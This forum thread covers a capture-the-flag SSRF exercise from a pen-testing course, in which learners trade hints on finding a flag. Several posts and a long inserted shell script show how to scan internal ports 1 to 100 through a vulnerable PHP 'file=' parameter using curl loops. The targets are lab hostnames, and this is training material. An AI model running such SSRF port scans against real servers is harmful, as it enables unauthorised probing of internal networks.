Struggling with SSRF 1.3 Challenge Exercise

I managed to get through 1.1 and 1.2 of the SSRF stuff.

It’s quite confusing and I feel like I need a little more instruction or a cheeky hint on where I need to go to get the flag in 1.3.

I can’t seem to figure it out, I know which port it is, and I also know the file, but I can’t access the file because I get a 403 forbidden. At least I think I know these things?

The Pen Testing Career Path has been good so far but this one is confusing me (I think it might be a bit too blunt in instructions?).

Any help would be great!

Okay I did find the flag, but I’m not really sure I did it the “right” way, if that makes sense?

I made a little script and did it through the console, but previous lessons were through the php web page example.

Just pretty confused but still managed it so yay?

Same issue, I do not understand what to do.

If I type http://ssrf.challenge2:22/test2.html

I receive

1

If I type http://ssrf.challenge2:80/test2.html

I receive

2

So it seems both ports 22 and 80 are alive, but so what? That does not help to retrieve any flag?

The SSRF3 page allows enumerating ports, not running scripts?

Or should I try to use a script like:

```bash
# Probe ports 1..10 one per iteration (original was missing the ";" separators)
for i in {1..10}; do
  curl -s "http://ssrf.challenge2:$i/test2.html"
  sleep 1
done
```

I have no idea, can someone help?

Hi there, having the same issue as @Hoele here.

Enumerating port 80 says - you don’t have permission to access this resource. Not sure how to proceed. Any pointers?


Also, tried enumerating ports 1-100 using the curl command, but no response there either.

You are all close. In the lab you did everything in Firefox, but you can’t solve this in Firefox unless you want to make 100 entries into that webform :slight_smile: Time to break out some command-line fu! :martial_arts_uniform:

1.) You need a for loop from 1 to 100. This is the port you will test.
2.) Use curl with --no-progress-meter for best results
3.) The URL is http://ssrf.example3/examples/ssrf3.php?file=ssrf.challenge2: followed by the port in the for loop.

I would send the output to a file (be sure to append >> not overwrite >) then look for connection output from a hidden service in that file. The flag is found in the connection output.

1 Like
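The three steps above written out as one POSIX shell script, as an added example that is not from the course material or any poster in this thread. The endpoint and hostnames are exactly the ones quoted in the hint; the output file name, the 5-second per-request timeout and the `run` argument that gates the scan are my own assumptions.

```shell
#!/bin/sh
# Added example (not the course's or the thread's own code): the for-loop /
# curl --no-progress-meter / append-to-file procedure from the hint above.
# SSRF_ENDPOINT is the URL quoted in the thread; OUT_FILE and the timeout
# are assumptions.

SSRF_ENDPOINT="http://ssrf.example3/examples/ssrf3.php?file=ssrf.challenge2:"
OUT_FILE="${OUT_FILE:-ssrf_ports.txt}"

# Step 3: the URL the vulnerable PHP page is asked to fetch for a given port.
ssrf_url() {
    printf '%s%s\n' "$SSRF_ENDPOINT" "$1"
}

# Step 2: fetch one port through the SSRF endpoint and APPEND (>>) the
# response to the file, tagged with the port so a hit can be traced back.
# "|| true" keeps a closed/filtered port from aborting the loop under set -e.
probe_port() {
    port="$1"
    {
        printf '=== port %s ===\n' "$port"
        curl --no-progress-meter --max-time 5 "$(ssrf_url "$port")" || true
        printf '\n'
    } >> "$OUT_FILE"
}

# Step 1: loop over ports 1..100 (seq instead of bash-only {1..100} so the
# script also runs under plain sh).
scan_ports() {
    first="${1:-1}"
    last="${2:-100}"
    : > "$OUT_FILE"          # truncate once up front, then only append
    for port in $(seq "$first" "$last"); do
        probe_port "$port"
    done
}

# The scan only runs when asked for explicitly ("sh ssrf_scan.sh run"), so
# sourcing the file for its functions does not touch the network.
if [ "${1:-}" = "run" ]; then
    scan_ports 1 100
    # Hide the per-port headers and the bare "1"/"2" replies seen on the
    # open ports; whatever is left is the connection output to read by hand.
    grep -v -e '^=== port' -e '^[12]$' -e '^$' "$OUT_FILE" || true
fi
```

Run it with `sh ssrf_scan.sh run`, then open the output file; the port whose block contains banner-like text rather than the usual short reply is the hidden service the hint refers to.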

Thank you @JosephWhite for the pointers. I was able to retrieve the flag.

1 Like